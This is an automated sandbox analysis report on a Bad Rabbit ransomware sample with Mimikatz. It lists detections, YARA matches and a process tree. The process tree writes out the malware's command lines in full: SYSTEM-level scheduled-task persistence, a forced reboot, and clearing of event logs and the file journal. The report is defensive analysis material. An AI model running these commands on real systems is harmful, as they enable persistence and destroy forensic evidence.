Windows Analysis Report
download.exe

Overview

General Information

Sample name: download.exe
Analysis ID: 1591384
MD5: fbbdc39af1139aebba4da004475e8839
SHA1: de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256: 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

Detection

Babuk, Mimikatz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Execute DLL with spoofed extension
System process connects to network (likely due to code injection or exploit)
Yara detected Babuk Ransomware
Yara detected Mimikatz
AI detected suspicious sample
Clears the journal log
Clears the windows event log
Contains functionality to create processes via WMI
Contains functionality to enumerate network shares of other devices
Contains functionality to infect the boot sector
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking mutex)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Eventlog Clear or Configuration Change
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • download.exe (PID: 7360 cmdline: "C:\Users\user\Desktop\download.exe" MD5: FBBDC39AF1139AEBBA4DA004475E8839)
    • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7412 cmdline: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15 MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 7432 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7480 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7532 cmdline: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7584 cmdline: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit" MD5: 48C2FE20575769DE916F48EF0676A965)
      • cmd.exe (PID: 7564 cmdline: /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7680 cmdline: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00 MD5: 48C2FE20575769DE916F48EF0676A965)
      • 2594.tmp (PID: 7624 cmdline: "C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1} MD5: 347AC3B6B791054DE3E5720A7144A977)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7784 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wevtutil.exe (PID: 7832 cmdline: wevtutil cl Setup MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7856 cmdline: wevtutil cl System MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7872 cmdline: wevtutil cl Security MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • wevtutil.exe (PID: 7888 cmdline: wevtutil cl Application MD5: 3C0E48DA02447863279B0FE3CE7FE5E8)
        • fsutil.exe (PID: 7904 cmdline: fsutil usn deletejournal /D C: MD5: 452CA7574A1B2550CD9FF83DDBE87463)
      • cmd.exe (PID: 8148 cmdline: /c schtasks /Delete /F /TN drogon MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5244 cmdline: schtasks /Delete /F /TN drogon MD5: 48C2FE20575769DE916F48EF0676A965)
  • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dispci.exe (PID: 8032 cmdline: "C:\Windows\dispci.exe" -id 3065482610 MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8084 cmdline: /c schtasks /Delete /F /TN rhaegal MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 8132 cmdline: schtasks /Delete /F /TN rhaegal MD5: 48C2FE20575769DE916F48EF0676A965)
  • LogonUI.exe (PID: 8172 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3f61055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • svchost.exe (PID: 7588 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 2596 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f6c855 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 6812 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • fontdrvhost.exe (PID: 5956 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • LogonUI.exe (PID: 1832 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f74055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cdd.dll (PID: 4 cmdline: MD5: 9B684213A399B4E286982BDAD6CF3D07)
  • LogonUI.exe (PID: 6100 cmdline: "LogonUI.exe" /flags:0x2 /state0:0xa3f04055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • fontdrvhost.exe (PID: 5296 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Babuk | Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and an old 32-bit PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
Name | Description | Attribution | Blogpost URLs | Link
MimiKatz | Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks. Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them. | APT32, Anunak, GALLIUM | | https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz
No configs have been found
Source | Rule | Description | Author | Strings
download.exe | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
Source | Rule | Description | Author | Strings
C:\Windows\dispci.exe | sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 | Bad Rabbit Ransomware | Christiaan Beek
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1b1bd:$x2: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$x2: need to do is submit the payment and get the decryption password.
  • 0x1b40a:$s3: If you have already got the password, please enter it below.
  • 0x1f55a:$s3: If you have already got the password, please enter it below.
  • 0x2130c:$s4: dispci.exe
  • 0x14500:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s6: Run DECRYPT app at your desktop after system boot
  • 0x147b8:$s7: Enter password#1:
  • 0x14676:$s8: Enter password#2:
  • 0x14430:$s9: C:\Windows\cscc.dat
  • 0x14940:$s10: schtasks /Delete /F /TN %ws
  • 0x1b448:$s11: Password#1:
  • 0x1f598:$s11: Password#1:
  • 0x14398:$s12: \AppData
  • 0x14650:$s13: Readme.txt
  • 0x14752:$s14: Disk decryption completed
  • 0x146ca:$s15: Files decryption completed
  • 0x212b4:$s16: http://diskcryptor.net/
  • 0x1b235:$s17: Your personal installation key#1:
C:\Windows\dispci.exe | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x148a0:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST
  • 0x14430:$x4: C:\Windows\cscc.dat
  • 0x1b1bd:$s1: need to do is submit the payment and get the decryption password.
  • 0x1f30d:$s1: need to do is submit the payment and get the decryption password.
  • 0x14500:$s2: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1b53f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x1f68f:$s5: Run DECRYPT app at your desktop after system boot
  • 0x146ca:$s6: Files decryption completed
  • 0x145ea:$s7: Disable your anti-virus and anti-malware programs
C:\Windows\cscc.dat | INDICATOR_TOOL_ENC_DiskCryptor | Detect DiskCryptor open encryption solution that offers encryption of all disk partitions | ditekSHen
  • 0x2b3d8:$d1: \DosDevices\dcrypt
  • 0x2b488:$d2: $dcsys$_fail_%x
  • 0x2b468:$d3: %s\$DC_TRIM_%x$
  • 0x2b3b8:$d4: \Device\dcrypt
  • 0x2b420:$d5: %s\$dcsys$
Source | Rule | Description | Author | Strings
00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp | sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 | Bad Rabbit Ransomware | Christiaan Beek
  • 0x138e8:$x1: schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
  • 0x1a205:$x2: need to do is submit the payment and get the decryption password.
  • 0x1e355:$x2: need to do is submit the payment and get the decryption password.
  • 0x1a452:$s3: If you have already got the password, please enter it below.
  • 0x1e5a2:$s3: If you have already got the password, please enter it below.
  • 0x20354:$s4: dispci.exe
  • 0x13548:$s5: \\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1)
  • 0x1a587:$s6: Run DECRYPT app at your desktop after system boot
  • 0x1e6d7:$s6: Run DECRYPT app at your desktop after system boot
  • 0x13800:$s7: Enter password#1:
  • 0x136be:$s8: Enter password#2:
  • 0x13478:$s9: C:\Windows\cscc.dat
  • 0x13988:$s10: schtasks /Delete /F /TN %ws
  • 0x1a490:$s11: Password#1:
  • 0x1e5e0:$s11: Password#1:
  • 0x133e0:$s12: \AppData
  • 0x13698:$s13: Readme.txt
  • 0x1379a:$s14: Disk decryption completed
  • 0x13712:$s15: Files decryption completed
  • 0x202fc:$s16: http://diskcryptor.net/
  • 0x1a27d:$s17: Your personal installation key#1:
Process Memory Space: rundll32.exe PID: 7412 | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security
Process Memory Space: dispci.exe PID: 8032 | JoeSecurity_babuk | Yara detected Babuk Ransomware | Joe Security
Source | Rule | Description | Author | Strings
0.2.download.exe.10ce578.1.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x5514:$x3: C:\Windows\infpub.dat
  • 0x5558:$s10: %ws C:\Windows\%ws,#1 %ws
0.0.download.exe.c00000.0.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
0.2.download.exe.c00000.0.unpack | BadRabbit_Gen | Detects BadRabbit Ransomware | Florian Roth
  • 0x6114:$x3: C:\Windows\infpub.dat
  • 0x6158:$s10: %ws C:\Windows\%ws,#1 %ws
11.0.2594.tmp.7ff73cfc0000.0.unpack | JoeSecurity_Mimikatz_2 | Yara detected Mimikatz | Joe Security
11.0.2594.tmp.7ff73cfc0000.0.unpack | BadRabbit_Mimikatz_Comp | Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035 | Florian Roth
  • 0xa848:$s1: %lS%lS%lS:%lS
  • 0xa440:$s2: lsasrv
  • 0xa868:$s3: CredentialKeys
  • 0xa878:$s4: 50 72 69 6D 61 72 79 00 6D 00 73 00 76 00

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7412, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7532, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7412, ParentProcessName: rundll32.exe, ProcessCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7532, ProcessName: cmd.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7532, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7584, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7532, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit", ProcessId: 7584, ProcessName: schtasks.exe
Source: Process started | Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105 | Data: Command: wevtutil cl Setup, CommandLine: wevtutil cl Setup, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wevtutil.exe, NewProcessName: C:\Windows\SysWOW64\wevtutil.exe, OriginalFileName: C:\Windows\SysWOW64\wevtutil.exe, ParentCommandLine: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7784, ParentProcessName: cmd.exe, ProcessCommandLine: wevtutil cl Setup, ProcessId: 7832, ProcessName: wevtutil.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cdd.dll, NewProcessName: C:\Windows\System32\cdd.dll, OriginalFileName: C:\Windows\System32\cdd.dll, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: cdd.dll
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7588, ProcessName: svchost.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Users\user\Desktop\download.exe", ParentImage: C:\Users\user\Desktop\download.exe, ParentProcessId: 7360, ParentProcessName: download.exe, ProcessCommandLine: C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15, ProcessId: 7412, ProcessName: rundll32.exe
No Suricata rule has matched


AV Detection

Source: download.exe | Avira: detected
Source: C:\Windows\dispci.exe | Avira: detection malicious, Label: TR/Diskcoder.12354
Source: C:\Windows\dispci.exe | ReversingLabs: Detection: 97%
Source: download.exe | ReversingLabs: Detection: 97%
Source: download.exe | Virustotal: Detection: 88%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04856085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,2_2_04856085
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04856299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,2_2_04856299
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,2_2_04855613
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,2_2_04855A73
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,2_2_04855BC4
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,2_2_04855507
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,2_2_04855D0A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0485554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,2_2_0485554A
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_048556D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,2_2_048556D8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04856246 CryptCreateHash,CryptHashData,CryptGetHashParam,2_2_04856246
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_04855780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,2_2_04855780
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0485559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,2_2_0485559B
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_048515A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_048515A7
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF42A0 VirtualAlloc,VirtualLock,GetCurrentThreadId,GetCurrentThreadId,SetWindowsHookExW,SetWindowsHookExW,GetCurrentThreadId,SetWindowsHookExW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,23_2_00DF42A0
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1080 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,23_2_00DF1080
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1810 CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,LocalFree,LocalFree,23_2_00DF1810
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1000 CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,23_2_00DF1000
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF19F0 CryptDuplicateKey,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptDecrypt,FlushViewOfFile,_wprintf,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,SetEvent,SetEvent,23_2_00DF19F0
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1DF0 CryptCreateHash,CryptHashData,CryptGetHashParam,23_2_00DF1DF0
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF15A0 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,23_2_00DF15A0
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1D70 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,23_2_00DF1D70
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1160 CryptEncrypt,CryptEncrypt,LocalAlloc,_memmove,CryptEncrypt,LocalFree,23_2_00DF1160
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF12A0 CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,23_2_00DF12A0
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1E40 CreateEventW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,23_2_00DF1E40
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF1220 CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,23_2_00DF1220
Source: C:\Windows\dispci.exe | Code function: 23_2_00DF43B7 CryptReleaseContext,23_2_00DF43B7
Source: download.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: download.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: lsasrv.pdb source: 2594.tmp, 0000000B.00000003.1719410656.0000000002EF6000.00000004.00000020.00020000.00000000.sdmp
